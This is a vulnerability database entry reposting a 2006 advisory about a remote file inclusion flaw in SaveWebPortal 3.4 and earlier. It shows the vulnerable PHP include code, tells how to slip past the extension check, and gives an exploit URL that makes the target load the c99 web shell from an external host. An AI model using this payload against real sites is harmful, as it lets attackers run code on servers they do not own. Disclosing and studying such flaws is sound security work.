Lucene search
Basic search
Lucene search
Search by product
Subscribe
K
Start 30-day trial
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
SIGN IN
Securityvulns
SECURITYVULNS:DOC:13845
History
Aug 10, 2006 - 12:00 a.m.
SaveWebPortal <= 3.4(page) Remote File Inclusion Vulnerability
2006-08-10
00:00:00
vulners.com
14
JSON
SaveWebPortal <= 3.4(page) Remote File Inclusion Vulnerability
Download:
http://www.circeos.it/frontend/theme4/index.php?page=downloads
Found by x0rax
[email protected]
Vulnerable Code:
<?php
…
if (strstr ($page, ".php") ||
strstr ($page, ".htm") ||
strstr ($page, ".html")) {
include ("$page");
…
?>
to inject succesfully you have to create a file called shell.html.txt or
shell.php.txt
otherwise it wont work!
Affected File:
index.php =]
Vulnerability:
http://host.com/index.php?page=http://master-boy.cwsurf.de/c99.php.txt
JSON